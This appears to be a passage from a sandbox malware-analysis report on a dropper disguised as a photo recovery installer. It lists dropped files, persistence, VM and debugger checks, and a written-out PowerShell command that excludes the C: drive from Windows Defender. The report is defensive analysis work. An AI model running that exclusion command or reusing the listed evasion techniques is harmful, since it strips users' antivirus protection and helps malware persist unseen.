            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-HHAV6.tmpJump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\silk[1].exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-4V98D.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeFile created: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libEGL.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exe
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | File created: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exe
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5Concurrent.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-DLELP.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_iscrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\is-PDB6I.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5PrintSupport.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-C06F8.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-0N6LU.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\unins000.exe (copy)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | File created: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuin51.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_shfoldr.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | File created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | File created: C:\Windows\Temp\VzUtW_3288.sys

            Boot Survival

            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D3E8B2 CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IV16YfWt_3288
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_0040DCE3 StartServiceCtrlDispatcherA

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004241EC IsIconic,SetActiveWindow,SetFocus
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004241A4 IsIconic,SetActiveWindow
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004175A8 IsIconic,GetCapture
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00417CDE IsIconic,SetWindowPos
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory allocated: 12A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory allocated: 1AF30000 memory reserve | memory write watch
            Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D3E9B6 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7168
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2652
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3242
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Dropped PE files which have not been started:
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libGLESv2.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-4V98D.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuuc51.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libEGL.dll (copy)
                C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_setup64.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcp100.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5Concurrent.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9CIKO.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-DLELP.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-N40N4.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9TUU2.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-G5VHU.tmp
                C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_iscrypt.dll
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\is-PDB6I.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcr100.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-HHAV6.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5PrintSupport.dll (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-C06F8.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-0N6LU.tmp
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\unins000.exe (copy)
                C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuin51.dll (copy)
                C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_shfoldr.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Dropped PE file which has not been started: C:\Windows\Temp\VzUtW_3288.sys
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_12-5977)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | API coverage: 4.7 %
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | API coverage: 4.8 %
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe TID: 6944 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 | Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7428 | Thread sleep count: 46 > 30
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7428 | Thread sleep time: -92000s >= -30000s
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7896 | Thread sleep time: -900000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep count: 6241 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 | Thread sleep count: 3242 > 30
            Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Last function: Thread delayed (2 entries)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_0041F300 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 0041F313h
            Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation (3 entries)
            Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00452AD4 FindFirstFileA,GetLastError
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00475798 FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Thread delayed: delay time: 60000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: svchost.exe, 00000007.00000002.2471765865.000002A7EEE4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: olume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000005.00000002.1378646279.000001798BEA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000#p
            Source: dxRwXy19pq.exe, 00000000.00000002.1329906446.000000000099B000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1329906446.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251221468.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.000000000099A000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.000000000099A000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: svchost.exe, 00000007.00000002.2471423939.000002A7EEE0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
            Source: svchost.exe, 00000007.00000002.2471670893.000002A7EEE2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000002.2471670893.000002A7EEE2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | API call chain: ExitProcess graph end node (graph_12-6774)
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | API call chain: ExitProcess graph end node (graph_14-60561)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_004029E0 GetCurrentProcess,CheckRemoteDebuggerPresent
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00404810 IsDebuggerPresent
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D4E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D35E59 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 entries)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_004011DC SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00401180 Sleep,SetUnhandledExceptionFilter,malloc,_initterm,GetStartupInfoA
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_0040F9F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00420439 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D480E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\ (2 entries)
